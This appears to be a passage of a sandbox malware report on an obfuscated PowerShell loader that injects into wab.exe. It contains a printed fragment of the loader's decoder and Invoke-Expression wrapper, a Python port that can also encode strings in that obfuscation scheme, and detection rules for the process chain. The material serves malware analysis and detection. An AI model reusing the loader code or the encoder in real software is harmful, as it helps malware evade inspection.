VirkP,pdrauBestilEmbralExpeloskraluOpsamtGamblsCorru] Mill=gente$ComorO MidtnUfordtspecio Ef el C lio Fodgg.valmi Uns.cI
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
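The command lines above carry the loader's own string decoder: `Circuted` walks the literal with `Substring`, reading one character at offset 5 and every sixth character after it, and `Udkrte` pipes the result into `$Polarizer`, which itself decodes to `iex`. The Python below is an added example written for this page, not part of the sample or of the Joe Sandbox report; it ports that routine, adds an encoder so the scheme can be round-tripped, and decodes three assignments copied from the command line. The filler words in `encode` and the `REPORT_EXCERPT` selection are the only constructed pieces.

```python
"""Port of the string decoder carried in the kam.cmd PowerShell stage (added example).

Stripped of its junk identifiers, the first stage reads:

    $Sanguinarily='Sub'; $Sanguinarily+='strin'; $Colour = 1; $Sanguinarily+='g'   # 'Substring'
    Function Circuted($s) {
        $Blazer = $s.Length - $Colour
        For ($i = 5; $i -lt $Blazer; $i += 6) { $out += $s.$Sanguinarily.Invoke($i, $Colour) }
        $out
    }
    function Udkrte($x) { . ($Polarizer) ($x) }    # $Polarizer decodes to 'iex'

Every sixth character from offset 5 is payload; the five before it are dictionary filler.
"""
import itertools
import re


def circuted(s: str) -> str:
    """Decode one literal: take s[5], s[11], s[17], ... while the offset is < len(s) - 1.
    The loop bound is Length-1, so the final character is never read; that is why every
    encoded literal in the command line ends in a throw-away space."""
    return "".join(s[i] for i in range(5, len(s) - 1, 6))


def encode(payload: str, filler_words=("Bolte", "Cubin", "Konst", "Flykk", "Zeppe")) -> str:
    """Inverse of circuted(): five filler characters before each payload character, plus
    the trailing space the decoder skips. The filler words are constructed for this example."""
    words = itertools.cycle(filler_words)
    return "".join(next(words) + ch for ch in payload) + " "


def decode_assignments(script: str) -> dict:
    """Pull every  $Name=Circuted '<literal>'  (optionally parenthesised) out of a command
    line and decode the literal."""
    pattern = re.compile(r"\$(\w+)\s*=\s*\(?\s*Circuted\s*'([^']*)'")
    return {name: circuted(lit) for name, lit in pattern.findall(script)}


# Three assignments copied verbatim from the command line in this report. None of them
# contains two adjacent spaces, so they survived the whitespace collapsing of the rendered
# HTML. Longer literals on this page, such as $Ontological (a Mozilla/5.0 browser
# User-Agent), did not: wherever the original held two spaces the page keeps one, every
# later offset shifts by one, and the decode turns to noise. Decode those from the raw
# sample or the sandbox's downloadable command line, not from the rendered page.
REPORT_EXCERPT = (
    "$Spisestel=Circuted 'Bolte>Cubin ';"
    "$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';"
    "$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';"
)


def report_strings() -> dict:
    """Decoded values of the three excerpted assignments."""
    return decode_assignments(REPORT_EXCERPT)


def round_trip(payload: str) -> bool:
    """Encoder and decoder agree for any payload."""
    return circuted(encode(payload)) == payload


if __name__ == "__main__":
    for name, value in report_strings().items():
        print(f"${name} -> {value!r}")
    # -> $Spisestel '>', $Polarizer 'iex', $Pullouts 'User-Agent'
    print(round_trip("echo %appdata%\\Klavers.Uen && echo t"))
```

`$Polarizer` resolving to `iex` is what turns every `Udkrte (Circuted '...')` call into an `Invoke-Expression` of the decoded text, which is the second-stage content the AMSI rows later in this report show being scanned.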
              Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wininet.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iertutil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sspicli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.storage.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wldp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: profapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winhttp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: iphlpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mswsock.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: winnsi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: urlmon.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: srvcli.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: netutils.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dnsapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rasadhlp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: fwpuclnt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: schannel.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: mskeyprotect.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: msasn1.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: dpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptsp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: rsaenh.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: cryptbase.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: gpapi.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncrypt.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ncryptsslp.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: uxtheme.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: propsys.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: edputil.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: windows.staterepositoryps.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: wintypes.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: appresolver.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: bcp47langs.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: slc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: userenv.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: sppc.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecorecommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: ntvdm64.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Section loaded: version.dll
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
              Source: Window Recorder | Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: @ntkrnlmp.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdb source: officeappguardwin32.exe.9.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbW source: powershell.exe, 00000006.00000002.2410289196.00000000079ED000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: lambda_methodCore.pdb source: powershell.exe, 00000006.00000002.2416249131.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdb source: notification_click_helper.exe.9.dr
              Source: Binary string: @winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.9.dr
              Source: Binary string: )"WINLOA~1.PDBk,"$5,"$5," source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
              Source: Binary string: wab.pdb source: OfficeScrSanBroker.exe.9.dr, jucheck.exe.9.dr, officeappguardwin32.exe.9.dr, dbcicons.exe.9.dr, sscicons.exe.9.dr, notification_click_helper.exe.9.dr, accicons.exe.9.dr
              Source: Binary string: in32.pdb source: officeappguardwin32.exe.9.dr
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2402584546.0000000003515000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdbbroker.pdb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\* source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2409876793.00000000222C4000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officescrsanbroker.pdb source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: ,"4winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: D:\dbs\el\omr\Target\x86\ship\postc2r\x-none\officeappguardwin32.pdbin32.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000S source: officeappguardwin32.exe.9.dr
              Source: Binary string: LC:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: broker.pdb source: OfficeScrSanBroker.exe.9.dr
              Source: Binary string: @winload_prod.pdbf,"@ source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: )"WINLOA~1.PDB source: wab.exe, 00000009.00000003.2409829520.00000000222C0000.00000004.00001000.00020000.00000000.sdmp
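The process rows at the top of this section form a recognisable chain: cmd.exe starts a hidden 64-bit powershell.exe, which spawns cmd.exe only to `echo %appdata%\...`, re-launches itself from SysWOW64, and finally starts the Windows Mail address-book binary wab.exe with no arguments (the host that the report's "Writes to foreign memory regions" and "Creates a process in suspended mode" signatures point at). The Python below is an added example, not part of the report: it expresses each hop as a rule over Sysmon Event ID 1 shaped records and walks the parent chain back from wab.exe. The event dicts are constructed from the report's own "Process created" rows; their pids, the explorer.exe root and the benign control row are assumptions, and the first-stage command line is truncated to its opening few hundred characters (the report flags the real one as very long).

```python
"""Detection logic for the kam.cmd process chain (added example, not from the report).
Events are Sysmon Event ID 1 shaped dicts built from the report's 'Process created' rows."""
import re

LONG_COMMAND_LINE = 1000  # the real first-stage command line runs to several thousand characters

# Opening of the first-stage script exactly as the report prints it; the remainder is omitted.
PS_BODY = r'''"$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}"'''

PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
ECHO = r'"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klavers.Uen && echo t"'

EVENTS = [  # constructed from the report; pids, ppids and the root entry are assumptions
    {"pid": 1, "ppid": 0, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe /c kam.cmd"},
    {"pid": 2, "ppid": 1, "Image": PS64, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -windowstyle hidden " + PS_BODY},
    {"pid": 3, "ppid": 2, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": PS64,
     "CommandLine": ECHO},
    {"pid": 4, "ppid": 2, "Image": PS32, "ParentImage": PS64,
     "CommandLine": '"C:\\Windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe" ' + PS_BODY},
    {"pid": 5, "ppid": 4, "Image": r"C:\Windows\SysWOW64\cmd.exe", "ParentImage": PS32,
     "CommandLine": ECHO},
    {"pid": 6, "ppid": 4, "Image": r"C:\Program Files (x86)\Windows Mail\wab.exe",
     "ParentImage": PS32, "CommandLine": r'"C:\Program Files (x86)\windows mail\wab.exe"'},
    # constructed benign control: an ordinary hidden-window script run that spawns nothing
    {"pid": 7, "ppid": 1, "Image": PS64, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -windowstyle hidden -File C:\scripts\backup.ps1"},
]


def _is_ps(path: str) -> bool:
    return path.lower().endswith("\\powershell.exe")


def _has_arguments(cmd: str) -> bool:
    """True when anything follows the (possibly quoted) image path."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmd)
    return bool(m and m.group(1).strip())


def check_event(ev: dict) -> list:
    """Rule hits for one process-creation event; an empty list means nothing fired."""
    img, parent, cmd = ev["Image"].lower(), ev["ParentImage"].lower(), ev["CommandLine"]
    hits = []
    if _is_ps(parent) and img.endswith("\\windows mail\\wab.exe") and not _has_arguments(cmd):
        hits.append("powershell spawned Windows Mail wab.exe with no arguments (injection host)")
    if _is_ps(parent) and _is_ps(img) and "\\system32\\" in parent and "\\syswow64\\" in img:
        hits.append("64-bit powershell re-launched itself as 32-bit (SysWOW64)")
    if _is_ps(img) and re.search(r"\.\$\w+\.Invoke\(", cmd):
        hits.append("method name held in a variable and called through .Invoke( (obfuscated Substring loop)")
    if _is_ps(img) and re.search(r"-windowstyle\s+hidden", cmd, re.I) and len(cmd) > LONG_COMMAND_LINE:
        hits.append("very long hidden-window powershell command line")
    if img.endswith("\\cmd.exe") and _is_ps(parent) and re.search(r"echo\s+%\w+%\\", cmd, re.I):
        hits.append("cmd.exe used by powershell to expand an environment path via echo")
    return hits


def analyze(events: list) -> dict:
    """Map pid -> rule hits, keeping only events that fired at least one rule."""
    out = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            out[ev["pid"]] = hits
    return out


def wab_lineage(events: list) -> list:
    """Parent chain of the first wab.exe, child first, with SysWOW64 images marked."""
    by_pid = {ev["pid"]: ev for ev in events}
    for ev in events:
        if not ev["Image"].lower().endswith("\\wab.exe"):
            continue
        chain, cur = [], ev
        while cur is not None:
            name = cur["Image"].rsplit("\\", 1)[-1].lower()
            if "\\syswow64\\" in cur["Image"].lower():
                name += " (wow64)"
            chain.append(name)
            cur = by_pid.get(cur["ppid"])
        return chain
    return []


if __name__ == "__main__":
    for pid, hits in analyze(EVENTS).items():
        print(pid, hits)
    print(" <- ".join(wab_lineage(EVENTS)))
```

On these records the benign control (pid 7) fires nothing, while the wab.exe launch, the 64-to-32-bit PowerShell hop, the `.Invoke(` indirection and both `echo %appdata%` helpers each fire on their own; a production rule should require two or more of them within one lineage rather than alerting on any single hit, since hidden-window PowerShell and a no-argument child process are common on their own.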

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000006.00000002.2418645721.000000000966A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2409553300.00000000074A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2407208321.00000000061C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
